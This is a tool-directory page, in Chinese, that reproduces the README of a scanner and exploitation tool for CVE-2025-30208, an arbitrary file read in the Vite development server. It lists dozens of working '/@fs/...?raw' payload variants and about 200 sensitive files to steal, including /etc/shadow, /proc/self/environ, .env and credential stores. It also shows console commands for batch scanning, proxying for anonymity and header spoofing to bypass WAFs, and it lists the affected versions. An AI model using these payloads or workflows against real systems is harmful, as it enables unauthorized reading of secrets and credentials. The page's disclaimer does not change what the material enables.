Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-30208 — CVE‑2025‑30208 是 Vite 开发服务器(一款流行的前端构建工具)中的一个中等严重程度的任意文件读取漏洞。 | Kitploit
工具/GitHubGitHub/themehackers/cve-2025-30208
漏洞扫描器Payload生成漏洞利用信息收集Web安全渗透测试
GitHubthemehackers/cve-2025-30208

CVE-2025-30208

CVE‑2025‑30208 是 Vite 开发服务器(一款流行的前端构建工具)中的一个中等严重程度的任意文件读取漏洞。

查看仓库
101年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

🔥 CVE-2025-30208 Vite 任意文件读取漏洞扫描器

Python License Security Status Modular

CVE-2025-30208 高级漏洞扫描器,具备企业级特性

用于检测 Vite 任意文件读取漏洞的专业渗透测试工具

🚀 快速开始 • 📋 功能特性 • 🔧 使用方法 • 📊 示例 • 🛡️ 安全


📖 概述

这是一个综合性漏洞扫描器,旨在检测和利用 Vite 开发服务器中的 CVE-2025-30208 漏洞。该漏洞允许攻击者通过 Vite 的文件系统端点实现任意文件读取,从而可能暴露敏感配置文件、源代码和系统信息。

🎯 此工具的功能

  • 检测 网络中存在漏洞的 Vite 实例
  • 安全地利用 任意文件读取漏洞
  • 发现 敏感文件和配置数据
  • 以多种格式 报告结果(HTML、JSON、控制台)
  • 管理 扫描会话和配置
  • 优雅地处理错误,具备自动重试机制

🏗️ 模块化架构

该工具现在采用模块化架构,以提升可维护性和可扩展性:

  • CVE-2025-30208.py - 主扫描器应用程序
  • payloads.py - 高级利用载荷(60+ 种变体)
  • sensitive_files.py - 综合性敏感文件数据库(200+ 个文件)
  • html_template.py - 增强的黑客风格 HTML 报告模板

🚀 快速开始

前提条件

root@kitploit:~
pip3 install -r requirements.txt

基本使用

root@kitploit:~
python3 CVE-2025-30208.py

CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > run

📋 功能特性

🔍 核心漏洞检测

  • 60+ 高级载荷: 全面的利用技术,实现最大检测率
  • 智能检测: 智能响应分析,避免误报
  • 实时验证: 持续验证目标响应
  • 全面测试: 测试所有已知的漏洞端点

🛡️ 增强的安全特性

  • 代理支持: 配置 HTTP/HTTPS 代理以实现匿名
  • 自定义请求头: 通过自定义 HTTP 请求头绕过 WAF/IPS
  • 速率限制: 可配置延迟以规避检测
  • 会话管理: 保存和恢复扫描会话
  • 输入验证: 全面的参数验证

🔧 高级功能

  • 批量扫描: 多线程扫描多个目标
  • 敏感文件发现: 自动发现 200+ 个敏感文件
  • 连通性测试: TCP/UDP/HTTP/HTTPS 协议测试
  • 错误恢复: 自动重试,采用指数退避
  • 全面日志记录: 详细日志,带时间戳

📊 报告与输出

  • 🎨 增强的 HTML 报告: 美观的黑客风格漏洞报告,包含动画效果
  • JSON 导出: 结构化数据,便于进一步分析
  • 控制台输出: 彩色编码实时反馈
  • 日志文件: 详细审计跟踪
  • 交互式 Web 界面: 内置 Web 服务器,用于查看报告

🔧 使用方法指南

1. 基本配置

root@kitploit:~
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > set FILEPATH etc/passwd

CVE-2025-30208 > test

2. 漏洞测试

root@kitploit:~
CVE-2025-30208 > run

# 启用详细模式以获取更详细的输出
CVE-2025-30208 > verbose
CVE-2025-30208 > run

3. 批量扫描

root@kitploit:~
CVE-2025-30208 > set THREADS 10
CVE-2025-30208 > batch

192.168.1.100:3000
192.168.1.101:3000
192.168.1.102:3000
[按两次回车结束]

4. 敏感文件发现

root@kitploit:~
CVE-2025-30208 > scan

5. 高级配置

root@kitploit:~
# 配置代理
CVE-2025-30208 > proxy
Enter proxy: http://127.0.0.1:8080

# 设置自定义请求头
CVE-2025-30208 > headers
Enter headers: {"User-Agent": "Custom Scanner"}

# 配置速率限制
CVE-2025-30208 > rate
Enter rate limit: 1.0

6. 增强的 HTML 报告

root@kitploit:~
# 生成美观的 HTML 报告
CVE-2025-30208 > pull

# 启动 Web 服务器查看报告
CVE-2025-30208 > web

# 在指定端口启动 Web 服务器
CVE-2025-30208 > web 8081

# 停止 Web 服务器
CVE-2025-30208 > web off

📊 命令参考


⚙️ 配置选项


🎨 增强的载荷系统

扫描器现在使用 60+ 种不同的载荷变体,组织在 payloads.py 中:

主要 @fs 载荷

root@kitploit:~
/@fs/{file_path}?raw??
/@fs/{file_path}?raw&url
/@fs/{file_path}?import&raw??
/@fs/{file_path}?raw&import
/@fs/{file_path}?import&url

扩展参数变体

root@kitploit:~
/@fs/{file_path}?raw&source
/@fs/{file_path}?raw&content
/@fs/{file_path}?raw&data
/@fs/{file_path}?raw&file
/@fs/{file_path}?raw&type=text
/@fs/{file_path}?raw&format=text
/@fs/{file_path}?raw&encoding=utf8

Vite 特有变体

root@kitploit:~
/@fs/{file_path}?raw&vite&dev
/@fs/{file_path}?raw&vite&hot
/@fs/{file_path}?raw&vite&hmr
/@fs/{file_path}?raw&development
/@fs/{file_path}?raw&debug

模块系统变体

root@kitploit:~
/@fs/{file_path}?raw&esm
/@fs/{file_path}?raw&cjs
/@fs/{file_path}?raw&umd
/@fs/{file_path}?raw&js
/@fs/{file_path}?raw&ts
/@fs/{file_path}?raw&json
/@fs/{file_path}?raw&css
/@fs/{file_path}?raw&html

替代端点

root@kitploit:~
/app/{file_path}?raw??
/App/{file_path}?raw??

🔍 增强的敏感文件发现

该工具现在测试 200+ 个敏感文件,组织在 sensitive_files.py 中:

🖥️ 系统文件 (Linux/Unix)

  • /etc/passwd - 用户账户信息
  • /etc/shadow - 加密密码数据
  • /etc/services - 网络服务
  • /etc/hosts - 主机名映射
  • /etc/fstab - 文件系统表
  • /etc/ssh/sshd_config - SSH 服务器配置
  • /etc/crontab - 系统计划任务
  • /etc/sudoers - Sudo 配置

📊 进程信息

  • /proc/version - 内核版本
  • /proc/cpuinfo - CPU 信息
  • /proc/meminfo - 内存信息
  • /proc/self/environ - 进程环境变量
  • /proc/self/cmdline - 进程命令行
  • /proc/net/tcp - TCP 连接
  • /proc/net/udp - UDP 连接

⚙️ 应用程序配置

  • .env - 环境变量
  • .env.local - 本地环境
  • .env.production - 生产环境
  • config.json - 应用程序配置
  • settings.json - 应用程序设置
  • application.properties - Spring 配置
  • application.yml - YAML 配置
  • database.yml - 数据库配置
  • secrets.json - 密钥管理

📦 Node.js / JavaScript 文件

  • package.json - Node.js 依赖项
  • package-lock.json - 锁定依赖项
  • yarn.lock - Yarn 锁定文件
  • vite.config.js - Vite 配置
  • vite.config.ts - TypeScript Vite 配置
  • tsconfig.json - TypeScript 配置
  • webpack.config.js - Webpack 配置
  • next.config.js - Next.js 配置
  • nuxt.config.js - Nuxt.js 配置
  • angular.json - Angular 配置
  • vue.config.js - Vue.js 配置
  • rollup.config.js - Rollup 配置
  • eslint.config.js - ESLint 配置

🔧 Git 文件

  • .git/config - Git 配置
  • .gitignore - Git 忽略规则
  • .gitattributes - Git 属性
  • .gitmodules - Git 子模块
  • .git/HEAD - 当前分支
  • .git/logs/HEAD - Git 日志
  • .git/refs/heads/master - master 分支
  • .git/refs/heads/main - main 分支

📚 文档文件

  • README.md - 项目文档
  • CHANGELOG.md - 变更日志
  • LICENSE - 许可证信息
  • CONTRIBUTING.md - 贡献指南
  • AUTHORS - 作者信息
  • TODO.md - 待办事项列表
  • ROADMAP.md - 开发路线图

🐳 Docker 文件

  • Dockerfile - Docker 配置
  • docker-compose.yml - Docker Compose
  • docker-compose.override.yml - 覆盖配置
  • .dockerignore - Docker 忽略规则
  • docker-compose.prod.yml - 生产配置
  • docker-compose.dev.yml - 开发配置

🌐 Web 服务器配置

  • nginx.conf - Nginx 配置
  • apache2.conf - Apache 配置
  • httpd.conf - HTTP 守护程序配置
  • .htaccess - Apache 访问控制
  • web.config - IIS 配置
  • robots.txt - 搜索引擎指令
  • sitemap.xml - 网站结构
  • manifest.json - Web 应用清单
  • sw.js - Service Worker
  • firebase.json - Firebase 配置
  • firebase.rules - Firebase 安全规则

🪟 Windows 文件

  • boot.ini - 启动配置
  • autoexec.bat - 自动执行脚本
  • system.ini - 系统配置
  • win.ini - Windows 配置
  • Users - 用户目录
  • Windows - 系统文件
  • Program Files - 应用程序目录

🍎 macOS 文件

  • System - 系统文件
  • Library - 库文件
  • Applications - 应用程序文件
  • private/etc/hosts - Hosts 文件
  • private/etc/passwd - 用户账户

🗄️ 数据库文件

  • database.db - SQLite 数据库
  • database.sqlite - SQLite 数据库
  • data.db - 数据数据库
  • dump.sql - 数据库转储
  • schema.sql - 数据库模式
  • migrations - 数据库迁移

📝 日志文件

  • logs - 日志目录
  • error.log - 错误日志
  • access.log - 访问日志
  • app.log - 应用程序日志
  • debug.log - 调试日志
  • combined.log - 合并日志

💾 备份文件

  • backup - 备份目录
  • backup.sql - 数据库备份
  • backup.zip - 压缩备份
  • dump - 数据转储
  • export - 数据导出

🔒 安全与认证

  • auth.json - 认证配置
  • credentials.json - 凭据存储
  • keys.json - 密钥管理
  • tokens.json - 令牌存储
  • jwt.json - JWT 配置
  • oauth.json - OAuth 配置

🔌 API 与服务文件

  • api.json - API 配置
  • swagger.json - API 文档
  • openapi.json - OpenAPI 规范
  • graphql.json - GraphQL 配置
  • schema.json - API 模式

☁️ 云端与部署

  • cloudformation.yml - AWS CloudFormation
  • serverless.yml - Serverless 配置
  • terraform.tf - Terraform 配置
  • kubernetes.yml - Kubernetes 配置
  • k8s.yml - Kubernetes 配置

📊 监控与分析

  • analytics.json - 分析配置
  • monitoring.json - 监控设置
  • metrics.json - 度量配置
  • telemetry.json - 遥测数据

🎨 增强的 HTML 报告

该工具现在生成美观的黑客风格 HTML 报告,包含:

✨ 视觉特性

  • 矩阵风格背景,带有动画掉落的字符
  • 渐变动画和发光效果
  • 交互式元素,悬停效果
  • 响应式设计,适配所有设备
  • 深色主题,为安全专业人员优化

📊 交互式统计

  • 实时计数器,显示总泄露数量和泄露字节数
  • 严重性指示器,带颜色编码
  • 每个泄露项的复制功能
  • 内容预览,显示大小和行数
  • 可展开的章节,用于详细分析

🔧 技术特性

  • Google 字体集成(JetBrains Mono, Orbitron)
  • CSS 动画和过渡
  • JavaScript 交互性,增强用户体验
  • 移动端响应式设计
  • 跨浏览器兼容性

🌐 Web 服务器集成

  • 内置 HTTP 服务器,用于查看报告
  • 自动打开浏览器
  • 端口配置选项
  • 简单的启动/停止命令

🛡️ 错误处理与恢复

自动重试机制

  • 3 次重试尝试: 失败的请求会自动重试
  • 指数退避: 重试之间的延迟逐渐增加
  • 智能错误分类: 对不同类型的错误进行不同处理
  • 优雅恢复: 工具在错误后继续运行

错误类别

  • NetworkError: 连接、超时、代理问题
  • ConfigurationError: 无效设置和参数
  • ValidationError: 无效输入参数
  • ScannerError: 一般扫描器错误

验证特性

  • 实时输入验证: 所有参数在使用前均经过验证
  • 配置验证: 扫描前进行完整验证
  • 连通性测试: TCP/UDP/HTTP/HTTPS 协议测试
  • 代理验证: 代理 URL 格式验证

📁 输出文件


📝 受影响版本

🚨 存在漏洞的版本

root@kitploit:~
6.2.0 ≤ Vite ≤ 6.2.2
6.1.0 ≤ Vite ≤ 6.1.1
6.0.0 ≤ Vite ≤ 6.0.11
5.0.0 ≤ Vite ≤ 5.4.14
Vite ≤ 4.5.9

✅ 不受影响的版本

root@kitploit:~
Vite ≥ 6.2.3
6.1.2 ≤ Vite < 6.2.0
6.0.12 ≤ Vite < 6.1.0
5.4.15 ≤ Vite < 6.0.0
4.5.10 ≤ Vite < 5.0.0

🛡️ 安全与道德使用

⚠️ 重要安全说明

  • 仅限授权测试: 只在你拥有或已获得明确许可的系统上使用
  • 负责任的披露: 将漏洞报告给系统所有者
  • 速率限制: 使用适当的延迟,避免压垮目标
  • 代理使用: 考虑使用代理以在适当情况下保持匿名
  • 法律合规: 确保遵守当地法律法规

🔒 最佳实践

  • 测试前务必获得书面许可
  • 仅在受控环境中使用
  • 记录所有测试活动
  • 尊重速率限制和系统资源
  • 负责任地报告发现

🚀 高级使用示例

示例 1: 全面网络扫描

root@kitploit:~
CVE-2025-30208 > set THREADS 20
CVE-2025-30208 > set RATE_LIMIT 0.5
CVE-2025-30208 > set TIMEOUT 10
CVE-2025-30208 > verbose
CVE-2025-30208 > batch

示例 2: 使用代理进行隐蔽扫描

root@kitploit:~
CVE-2025-30208 > proxy
Enter proxy: http://127.0.0.1:8080
CVE-2025-30208 > headers
Enter headers: {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"}
CVE-2025-30208 > set RATE_LIMIT 2.0
CVE-2025-30208 > run

示例 3: 增强报告工作流程

root@kitploit:~
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > run
CVE-2025-30208 > pull
CVE-2025-30208 > web 8080

示例 4: 敏感文件发现

root@kitploit:~
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > scan

🏗️ 项目结构

root@kitploit:~
CVE-2025-30208/
├── CVE-2025-30208.py          # 主扫描器应用程序
├── payloads.py                # 高级利用载荷(60+)
├── sensitive_files.py         # 敏感文件数据库(200+)
├── html_template.py           # 增强的 HTML 报告模板
├── README.md                  # 本文档
├── requirements.txt           # Python 依赖项
├── logs/                      # 日志文件目录
├── data_leak.html            # 生成的 HTML 报告
├── data_leak.json            # 生成的 JSON 报告
└── session.json              # 保存的会话配置

🤝 贡献

我们欢迎贡献以改进此工具:

  1. Fork 这个仓库
  2. 创建 一个特性分支
  3. 进行 你的改动
  4. 充分测试
  5. 提交 一个 Pull Request

贡献领域

  • 在 payloads.py 中添加新的载荷变体
  • 在 sensitive_files.py 中添加额外的敏感文件模式
  • 在 html_template.py 中增强 HTML 模板
  • 改进错误处理
  • 性能优化
  • 文档改进

📄 许可证

本项目仅用于教育和授权安全测试目的。

⚠️ 法律免责声明: 此工具仅适用于授权安全测试和研究目的。用户有责任确保在测试任何系统之前已获得适当授权。作者不对任何滥用此工具的行为负责。


👨‍💻 作者

ThemeHackers

GitHub

安全研究员与渗透测试专家


⭐ 如果此工具对你有帮助,请给它一个星标!⭐

为安全社区倾心打造 ❤️

下载工具
命令描述示例
set <option> <value>设置配置选项set RHOST 192.168.1.100
show options显示当前设置show options
edit交互式选项编辑器edit
run / exploit运行漏洞测试run
batch批量扫描多个目标batch
scan发现敏感文件scan
pull导出结果到 HTML/JSONpull
web [on|off|port]HTML 报告 Web 服务器web 8080
save保存会话配置save
load加载会话配置load
test测试与目标的连通性test
validate验证当前配置validate
verbose切换详细模式verbose
proxy配置代理设置proxy
headers设置自定义 HTTP 请求头headers
rate配置速率限制rate
log显示日志信息log
help / ?显示帮助help
exit / quit退出工具exit
选项描述默认值验证规则
RHOST目标主机/IP 地址-主机名/IP 验证
RPORT目标端口号-端口范围 (1-65535)
FILEPATH要测试的文件路径etc/passwd路径验证
PROXYHTTP/HTTPS 代理 URL-URL 格式验证
VERBOSE启用详细输出false布尔值验证
RATE_LIMIT请求之间的延迟(秒)0.3数字验证
THREADS批量扫描的线程数5整数验证
TIMEOUT请求超时(秒)5整数验证
CUSTOM_HEADERS自定义 HTTP 请求头(JSON){}JSON 格式验证
  • prettier.config.js - Prettier 配置
  • jest.config.js - Jest 配置
  • babel.config.js - Babel 配置
  • tailwind.config.js - Tailwind CSS 配置
  • 文件描述格式
    data_leak.html增强的黑客风格 HTML 漏洞报告HTML
    data_leak.json结构化的 JSON 导出JSON
    sensitive_files_discovery.json发现的敏感文件JSON
    session.json保存的会话配置JSON
    logs/cve_2025_30208_YYYYMMDD_HHMMSS.log详细审计日志文本